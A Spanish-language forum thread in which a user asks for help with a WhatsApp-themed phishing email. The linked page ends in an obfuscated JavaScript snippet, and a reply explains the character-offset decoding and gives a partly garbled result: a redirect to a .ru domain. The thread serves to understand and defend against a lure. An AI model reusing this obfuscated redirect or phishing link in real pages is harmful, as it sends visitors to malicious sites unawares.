Email con script sospechoso

Iniciado por novato3, 20 Marzo 2016, 23:26 PM

0 Miembros y 1 Visitante están viendo este tema.

novato3

Hola a todos hoy recién recibí un mail en nombre de Whatsapp con el siguiente link:

Web: xttp://abbodesign.nl/obeying.php

Al final del código fuente encuentro el siguiente script:

<script type="text/javascript">
function harmlesse() { harmlessa=46; harmlessb=[165,151,156,146,157,165,92,162,157,158,92,154,157,145,143,162,151,157,156,92,150,160,147,148,107,85,150,162,162,158,104,93,93,149,154,157,144,143,154,150,147,143,154,162,150,161,163,158,158,154,167,92,160,163,85,105]; harmlessc=""; for(harmlessd=0;harmlessd<harmlessb.length;harmlessd++) { harmlessc+=String.fromCharCode(harmlessb[harmlessd]-harmlessa); } return harmlessc; } setTimeout(harmlesse(),1280);
</script>


He intentado desofuscar el código de forma online en jsbeautifier pero no consigo nada.

Saludos y gracias.

Stakewinner00

Esa secuencia de bytes en teoria contiene "window.to.location.href='htt://globalhealthsuly.ru&#039;i"  y ese dominio no parece existir. que raro.

novato3

Hola gracias por responder, podrías decirme como lo has descodificado? :huh:

Cada vez que entro a la web, function cambia de nombre, es aleatorio  :-X

Saludos y gracias.

Stakewinner00

Cita de: novato3 en 21 Marzo 2016, 21:14 PM
Hola gracias por responder, podrías decirme como lo has descodificado? :huh:

Cada vez que entro a la web, function cambia de nombre, es aleatorio  :-X

Saludos y gracias.
String.fromCharCode(harmlessb[harmlessd]-harmlessa
harmlesa=46
harmlessb[harmlessd] es cada uno de los números de harmlessb, restas a esos números el 46 y lo pasas de decimal a ascii.